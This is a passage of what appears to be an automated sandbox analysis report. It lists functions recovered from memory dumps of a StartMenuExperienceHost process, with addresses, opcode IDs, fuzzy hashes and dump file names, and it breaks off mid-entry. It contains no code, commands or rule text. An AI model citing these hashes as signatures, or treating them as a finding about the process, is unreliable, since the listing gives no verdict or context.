              • String ID: Ne4$p\e4
              • API String ID: 0-493680112
              • Opcode ID: 32cb44f26e56faba9843b2f03039aeef8ac2f430dc284cf39ce87f9d8a1a4bed
              • Instruction ID: 42fbc716a934552eb80363aa89f7c185706f5375bee961c8c8599e10161a2427
              • Opcode Fuzzy Hash: 32cb44f26e56faba9843b2f03039aeef8ac2f430dc284cf39ce87f9d8a1a4bed
              • Instruction Fuzzy Hash: 4D91A7B1A18A8A8EE7A99F6488B53F87AE1FF55304F4481BED10DD21D2CD7C6844DB81
              Function 00007FFD3477C562 Relevance: 1.4, Strings: 1, Instructions: 108COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: S_H
              • API String ID: 0-1697064872
              • Opcode ID: 36c2208f82423bb57b7ac8ef5165c87fa7ba49755611940c1b0db009d9b24113
              • Instruction ID: 14c8dedf3861320911f7bc9fe18787814aae8ee4868f52792f71442c6aca9339
              • Opcode Fuzzy Hash: 36c2208f82423bb57b7ac8ef5165c87fa7ba49755611940c1b0db009d9b24113
              • Instruction Fuzzy Hash: 0331DCB1E1891D8FEB94EB5898E96FCBBB1FF99300F905139D10DE3281DE6868419B40
              Function 00007FFD347815B2 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34780000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: /
              • API String ID: 0-2043925204
              • Opcode ID: 8fc32dbf1613740f6220828429e7ac61c37a0a8dddbaa7a52d1cb166415df818
              • Instruction ID: abace2377021ba26c03cef48496a65e42d64c6b6a4d86af9298b3db5b66f6290
              • Opcode Fuzzy Hash: 8fc32dbf1613740f6220828429e7ac61c37a0a8dddbaa7a52d1cb166415df818
              • Instruction Fuzzy Hash: B231E375E08629CEEBA4DF58C8A57E9B7B1FB55311F1041AAD40DE3282CB386984DF80
              Function 00007FFD34770A01 Relevance: 1.3, Strings: 1, Instructions: 65COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: 8vf4
              • API String ID: 0-1454646052
              • Opcode ID: 17076b7438b46a652ea36fdfec8b0c6b10dc242f00e6a92cdd033571c7d949e8
              • Instruction ID: ef87560fcf6257b6d9894968cc0302f94b52bb707862869fd321fcc36d108dd0
              • Opcode Fuzzy Hash: 17076b7438b46a652ea36fdfec8b0c6b10dc242f00e6a92cdd033571c7d949e8
              • Instruction Fuzzy Hash: 9B11C471A1854E8FE790EF68C8992BD7BE0FF5A310F818576D509D61A2EE78F540C780
              Function 00007FFD3477124D Relevance: 1.3, Strings: 1, Instructions: 57COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: pyf4
              • API String ID: 0-55055563
              • Opcode ID: b73973cde54ab16dce5e9b5edeb0c5eb957b25399b35fe668237c897bd5eeced
              • Instruction ID: 0fc5bbc5e3f7537775da4607ec4651c46d8b69f8adb189786dd38c9a8c50dad8
              • Opcode Fuzzy Hash: b73973cde54ab16dce5e9b5edeb0c5eb957b25399b35fe668237c897bd5eeced
              • Instruction Fuzzy Hash: 0111C471B1864A8EEB999F64C8B82B97BE0FF56304F4444BEC50AD61D2DE78B540D740
              Function 00007FFD34771260 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: pyf4
              • API String ID: 0-55055563
              • Opcode ID: 456ebfd7c8b36c5529f8bd651b8b4eae582313d757d438ea781da456155e659e
              • Instruction ID: d3e6bc0b44a9eeddaebfe8e4ff367c3f4be4e45becf4073acaf9dd6b59442389
              • Opcode Fuzzy Hash: 456ebfd7c8b36c5529f8bd651b8b4eae582313d757d438ea781da456155e659e
              • Instruction Fuzzy Hash: 6AF0F470F0954E8AEB949BA489A82F97BE0FF46204F40403AD60AC11C2DE687510D380
              Function 00007FFD347803E4 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34780000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID: P
              • API String ID: 0-3110715001
              • Opcode ID: aa5f2709edc1ff099110456efe0fc1d0cf198aed2c6df415270028bfc51d32f0
              • Instruction ID: 2dc3810ed77db75c7a3fa5647593b5fca0b5aa7004ed7bbc77584dedd2c65791
              • Opcode Fuzzy Hash: aa5f2709edc1ff099110456efe0fc1d0cf198aed2c6df415270028bfc51d32f0
              • Instruction Fuzzy Hash: 34F0A5B0D1962D8EEBA5DF1488A07F8BAF5AF19301F4040E9D50CE2281CB786B90DF80
              Function 00007FFD347716C8 Relevance: .3, Instructions: 284COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: eecd76162ff9fb78d536102e02910e9432def1aa727b38d4e2039d4aeb08a0a0
              • Instruction ID: 6efd26ef909ce8f2cdb101a2e759160e73c22e5b431f655dff5de72b4dd6683e
              • Opcode Fuzzy Hash: eecd76162ff9fb78d536102e02910e9432def1aa727b38d4e2039d4aeb08a0a0
              • Instruction Fuzzy Hash: 1E91D071B0CA498FDB58DE188CA55B97BE2FF99304B14857AE54DD3382CE78F8028781
              Function 00007FFD34770CF8 Relevance: .3, Instructions: 262COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: dad9e0e125d88a5e116f41af3b2977831c5ea9a536164e998daaf6601b151b0a
              • Instruction ID: 9a2575ecf15146ae193a9d128fa16f0078c956c2cdb6da2ed8c957558b0ffb11
              • Opcode Fuzzy Hash: dad9e0e125d88a5e116f41af3b2977831c5ea9a536164e998daaf6601b151b0a
              • Instruction Fuzzy Hash: 7E91F671F099498EEB54EB248CA5BF877A1FF56310F4082B9D10DE7192DE78B9458B80
              Function 00007FFD34786615 Relevance: .2, Instructions: 181COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3aeaec8fec73f5d61592decbc41b48e3f5c695d2778cb51805f48396b528ba85
              • Instruction ID: 47cccfe0e9bd513ea87889deee09d0c0a50d6f1ff55774711daf9d1e3015719e
              • Opcode Fuzzy Hash: 3aeaec8fec73f5d61592decbc41b48e3f5c695d2778cb51805f48396b528ba85
              • Instruction Fuzzy Hash: 7E615DB0E0851EDBEBA4DB54C8AA7BD76B1FF56301F0041BAD10DE2292DF386985DB41
              Function 00007FFD34771D0B Relevance: .2, Instructions: 167COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6785f2a546869c4dd8055545959a1af11610f3fe38b71a519f5eb646dd6eb374
              • Instruction ID: 2a00214a0df9d1887af556a408708de168c59ab65a2ff8d5c646dae928d41ec8
              • Opcode Fuzzy Hash: 6785f2a546869c4dd8055545959a1af11610f3fe38b71a519f5eb646dd6eb374
              • Instruction Fuzzy Hash: 1151E370B18A498FDB58DE1888A45BA77E2FF99305B14857ED54EC3381CE74B802CBC1
              Function 00007FFD34773155 Relevance: .2, Instructions: 166COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d9257d500801e79066431664a3c98d7c3dccf1de74e5d04e7c66978f41ba317b
              • Instruction ID: 9620c6c263215df24e87579f116ddac0f7c855f221414d04b5724e81a0013cd5
              • Opcode Fuzzy Hash: d9257d500801e79066431664a3c98d7c3dccf1de74e5d04e7c66978f41ba317b
              • Instruction Fuzzy Hash: 31512BB0E18519CFEB54DB94C9A46FDBBF1FF49301F904039D509E7292DA786944DB80
              Function 00007FFD3477CB4D Relevance: .2, Instructions: 164COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3600f61c375ca2f81a32359140225c62e3d19a737561b0adb29d3f37d32e040f
              • Instruction ID: 2dc1e25ac7d02642c05006cdb2be585046131c08a050055b08c7cf0207920850
              • Opcode Fuzzy Hash: 3600f61c375ca2f81a32359140225c62e3d19a737561b0adb29d3f37d32e040f
              • Instruction Fuzzy Hash: B941D173B089238BE710BBACB8661FD7B54EF46339B548137D24CDA083DA6C309696D4
              Function 00007FFD3477CB78 Relevance: .1, Instructions: 145COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9cd87f5a5af54cdd6a182d1656a2a53e17b6126ba0ffc689d8edb44ef240395a
              • Instruction ID: 6edaffe857f638304264da79a097e8f851b3969580cf671523223c3104d4d404
              • Opcode Fuzzy Hash: 9cd87f5a5af54cdd6a182d1656a2a53e17b6126ba0ffc689d8edb44ef240395a
              • Instruction Fuzzy Hash: C941D163B089278BE710BBACB8661FD7F54EF46339B548137D20CDA093DA6C309692D4
              Function 00007FFD3477CB80 Relevance: .1, Instructions: 141COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 64b84ae0a9cbaa87fcdc930aba48b62743007d009cba9f03a4759e650fbcb747
              • Instruction ID: 86fee76ab8488e91287b4ccc88ed756a4e6173cf10a4d2786ab55e3b6d2d64f9
              • Opcode Fuzzy Hash: 64b84ae0a9cbaa87fcdc930aba48b62743007d009cba9f03a4759e650fbcb747
              • Instruction Fuzzy Hash: 7D41B163B089278BE710BBACB8661FD7B54EF46339B548137D20CDA093DA6C309596D4
              Function 00007FFD34772115 Relevance: .1, Instructions: 138COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 82755f23926f09fdefc6309786a0553958a40a51085dea883372a5d31b98e771
              • Instruction ID: 26ac090c1842ec1a2e0272785c021fb54efdefeb484f7190f44ecd2ebf829b0e
              • Opcode Fuzzy Hash: 82755f23926f09fdefc6309786a0553958a40a51085dea883372a5d31b98e771
              • Instruction Fuzzy Hash: 06418971B0DA4A8FE355DB7888A51B87BD0FF87300F4584BAD11DC7292DE6CB8018381
              Function 00007FFD34782E28 Relevance: .1, Instructions: 128COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34780000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4fd90d426a46310d33f2bf8c0b4e9597e929953089d8aea735655bf9d111e2fe
              • Instruction ID: fd253f087cac42c38fec4ed5e85d8c5c607ec830270c09c68181465716eaa543
              • Opcode Fuzzy Hash: 4fd90d426a46310d33f2bf8c0b4e9597e929953089d8aea735655bf9d111e2fe
              • Instruction Fuzzy Hash: 5B41FAB0E1861D8EEB94EB58D8A5BBCB6B1FF59301F4055B9C00DE3292DF386985DB40
              Function 00007FFD34782E43 Relevance: .1, Instructions: 127COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34780000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4f61a9179582813768cc7a43046fc0a1f66e44e519fb4f276f9b2ce668aa37b0
              • Instruction ID: 41ba7fac180528cb51f8a3010518fd89ad6c9d68182fb59dd786418e99f290d4
              • Opcode Fuzzy Hash: 4f61a9179582813768cc7a43046fc0a1f66e44e519fb4f276f9b2ce668aa37b0
              • Instruction Fuzzy Hash: A241EAB0E0851D8EEB94EB68D895BBCB6B2FF59301F5051B9D00DE3291DF386981DB40
              Function 00007FFD34771DA3 Relevance: .1, Instructions: 118COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f5e24ecb1aab6c20a7fc1553d379aa6b18a13dd3aa07875a1b0055afee100fe7
              • Instruction ID: 3a7a8757938a38861e67e5236be72f61c72740284d899e6632bb8f15928fb473
              • Opcode Fuzzy Hash: f5e24ecb1aab6c20a7fc1553d379aa6b18a13dd3aa07875a1b0055afee100fe7
              • Instruction Fuzzy Hash: CB318070B18A4A8FCB4CDE1CC8A557A77E2FBD9305B10853EE54AD3385CE74E8128B81
              Function 00007FFD3477CBD3 Relevance: .1, Instructions: 118COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f502b04b0b2dd597da1e149b64f8d51303440b9d02da5cab82f5fd220090ebb8
              • Instruction ID: eeb2c8ece4ad0cd03f7855f7a56c3dd8ef1814ca71464d2e7881b336df1e251c
              • Opcode Fuzzy Hash: f502b04b0b2dd597da1e149b64f8d51303440b9d02da5cab82f5fd220090ebb8
              • Instruction Fuzzy Hash: E631B1A7B089278BE714BBACB8A60FD3F50EF46339B448137D208D6092DE6C305592D4
              Function 00007FFD34787469 Relevance: .1, Instructions: 115COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 86cb665093611454219556965b896c19da3d67180c133143a12a626123cafd93
              • Instruction ID: 5b77b171ddd3be38d9dc2dff54fa000891decfb0d7db45ae90a6b0eb0d8dc425
              • Opcode Fuzzy Hash: 86cb665093611454219556965b896c19da3d67180c133143a12a626123cafd93
              • Instruction Fuzzy Hash: 2841BEB0A0865ACEEB94DF54C8A62FD7BE1EF16311F14417AD50EE2292CA3CA84497C1
              Function 00007FFD3477C5DA Relevance: .1, Instructions: 96COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6f69c8951e29ff8fe58bf1d9c3b9c5ef2dc368a2a496212f6f7d058acb2798e7
              • Instruction ID: 7a18e8c004df86d31b22ec7ea8ec0fe18c58659c66c326b43f49e24be4dc8e03
              • Opcode Fuzzy Hash: 6f69c8951e29ff8fe58bf1d9c3b9c5ef2dc368a2a496212f6f7d058acb2798e7
              • Instruction Fuzzy Hash: 7A21F0B1E0891DCFEB94EB589CE96BCBBB1FF5A300F905139D10DD7242DE6868419B40
              Function 00007FFD34787345 Relevance: .1, Instructions: 89COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cf894a85d9454c05991a6c2ddc0d764eb59c496dac40765f29e93c0c555ba809
              • Instruction ID: b58947c2252728b93b342873dd5af98c5e3f839c4ee83f6d059e69548449c37d
              • Opcode Fuzzy Hash: cf894a85d9454c05991a6c2ddc0d764eb59c496dac40765f29e93c0c555ba809
              • Instruction Fuzzy Hash: B6319371A0D98ACBEBA59F6488A72F937A0FF16315F04007AD90EC2592DE38B450D782
              Function 00007FFD347722F9 Relevance: .1, Instructions: 86COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 99dcd77ebb9072a3f6750c116e9fe442c4743a55ea1b360833574b408cb3d20b
              • Instruction ID: b4a466936b205b183c51c9c9c899acd817bbe6e0c784c0a26574f1fcdb161895
              • Opcode Fuzzy Hash: 99dcd77ebb9072a3f6750c116e9fe442c4743a55ea1b360833574b408cb3d20b
              • Instruction Fuzzy Hash: 6431A4B0E5C50ACAE750DB10CCA16F87BA0FF53310F90927AC26ED6192CEAC7404AAC1
              Function 00007FFD347733F1 Relevance: .1, Instructions: 85COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aa7dff881010139188373068d724d9e3703a19b89c6f75fce7466e8651a7dac1
              • Instruction ID: 59f6f24cbd9efe442dd1c692e436c3248d22b0c9b09ebdeb65990276d4096764
              • Opcode Fuzzy Hash: aa7dff881010139188373068d724d9e3703a19b89c6f75fce7466e8651a7dac1
              • Instruction Fuzzy Hash: C221D170A4864ECFEB55EB6488692BE7BE0FF16300F4048BAD409D2191DF38A540D781
              Function 00007FFD3477B2E4 Relevance: .1, Instructions: 83COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 472bd49d5d2b68d66c41f90f2d953b6b107cf573dfe96083b401a07bc2d32aae
              • Instruction ID: 07900e4988675596def4099c2b95ced1851a1465dbd2b9f4b7d8aa2d09ede5b4
              • Opcode Fuzzy Hash: 472bd49d5d2b68d66c41f90f2d953b6b107cf573dfe96083b401a07bc2d32aae
              • Instruction Fuzzy Hash: B121A371A1890ECEEB50EB688C9D5F97BE5EF4A304F8089B2D11DD3196EE78B540D780
              Function 00007FFD34787881 Relevance: .1, Instructions: 83COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6447a5e8e3f3a565722d70274ef23ec69e41ab6d7b2e15eef65542c1c2f14241
              • Instruction ID: c1d9161d29626287d8a1151f175393df0b5648822bc87839f64f4baf6defa485
              • Opcode Fuzzy Hash: 6447a5e8e3f3a565722d70274ef23ec69e41ab6d7b2e15eef65542c1c2f14241
              • Instruction Fuzzy Hash: B2214171A1865ECEE7D1AB78889A2F97BE0FF1A301F0049B6D509D6191EA38A540D781
              Function 00007FFD34787FB6 Relevance: .1, Instructions: 78COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34784000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34784000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34784000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2a9eaecd0ec07a15837d4889be9e97226f4ecc64e1d2656495a53d21706995cf
              • Instruction ID: 382cbba75bad8e451536e2203d6ea3f8fc6eb6d7ab4b9a1046a7d6da90b09052
              • Opcode Fuzzy Hash: 2a9eaecd0ec07a15837d4889be9e97226f4ecc64e1d2656495a53d21706995cf
              • Instruction Fuzzy Hash: DD216671E0851ACFDB90EB98C8928ECB3F1FF59311F504536D00AE7286DA38B801DBA0
              Function 00007FFD3477A921 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f4173062680ac0ccf3c4ac2d61b8fda19db0cac2663927c8ce2d9e7c12c703bd
              • Instruction ID: 1659652d4a2cb8ea76384fccd4728f5e6cb9f7d2e3893717248a166f3f1ce335
              • Opcode Fuzzy Hash: f4173062680ac0ccf3c4ac2d61b8fda19db0cac2663927c8ce2d9e7c12c703bd
              • Instruction Fuzzy Hash: A3214D70A1464D8FDB85EF58C895AF93BF0FF69305F01416AE809D3252DB34A451CB80
              Function 00007FFD34782678 Relevance: .1, Instructions: 71COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34780000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2a92534b333f4a74e6f04fdb19b531d9208b0baf05e110e16d251273f9694ee0
              • Instruction ID: 92ad776fa84f0b3b4214abf11f7d23c37e36ff5c75a471dccaf91f054c8980eb
              • Opcode Fuzzy Hash: 2a92534b333f4a74e6f04fdb19b531d9208b0baf05e110e16d251273f9694ee0
              • Instruction Fuzzy Hash: E621203058D2C98FDB878B7088765F63FB0AF07215F0900EBE489CB0A3C92D255AC352
              Function 00007FFD34782B10 Relevance: .1, Instructions: 71COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34780000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 16eb4ea90b335ac9e28ebd71b7d540d6a6c17e974dce37ad6ac0b0a7b21a5f22
              • Instruction ID: 68914e18aa08d19b8af141c7728ae84cc5b24b699906bb0c80cb97e2d943ad31
              • Opcode Fuzzy Hash: 16eb4ea90b335ac9e28ebd71b7d540d6a6c17e974dce37ad6ac0b0a7b21a5f22
              • Instruction Fuzzy Hash: EF21AE7194D7C98FD7469B6088BA0A57FB0EF17302B1A00EBC849CB1E3EA2C6945C352
              Function 00007FFD34773350 Relevance: .1, Instructions: 69COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9baa03577e8233b3de896567872080f5aa5d36813d905bf6e8fbe1a7cb46dbef
              • Instruction ID: f5b23ce4b539c1478b1a2c626361ad764c5c8ff16963e58b382c1fdabec571d9
              • Opcode Fuzzy Hash: 9baa03577e8233b3de896567872080f5aa5d36813d905bf6e8fbe1a7cb46dbef
              • Instruction Fuzzy Hash: 3C21A17094D28A8FD382ABB488686A97FF0FF47310F0544EAC049CB062EA7CA945C750
              Function 00007FFD347828F1 Relevance: .1, Instructions: 67COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34780000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34780000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 46f345bc1b32f2db5bdc67dac174860c3939732d0d59dd4d881635fa37aa8083
              • Instruction ID: d7b06ecc373f18c124a5b4acb9fccfbf97b1c5baa2edfd44545b15d77aa9f72f
              • Opcode Fuzzy Hash: 46f345bc1b32f2db5bdc67dac174860c3939732d0d59dd4d881635fa37aa8083
              • Instruction Fuzzy Hash: C211AC70A086498FDB88DF28D4A61F93BE1FF5A302F01117EE80AD2281CA38A541DB81
              Function 00007FFD3477BBAE Relevance: .1, Instructions: 66COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 0000001E.00000002.2233201695.00007FFD34770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34770000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_30_2_7ffd34770000_StartMenuExperienceHost.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c2d93a9485277f6ac80b9bfc9c9127c91824f20c19e533c6046b1447517a4d74
              • Instruction ID: b3d7358fb19859a7bb0fdb2b18e0f0f9b2637a4d312360e53cfc5c48bd74ace0
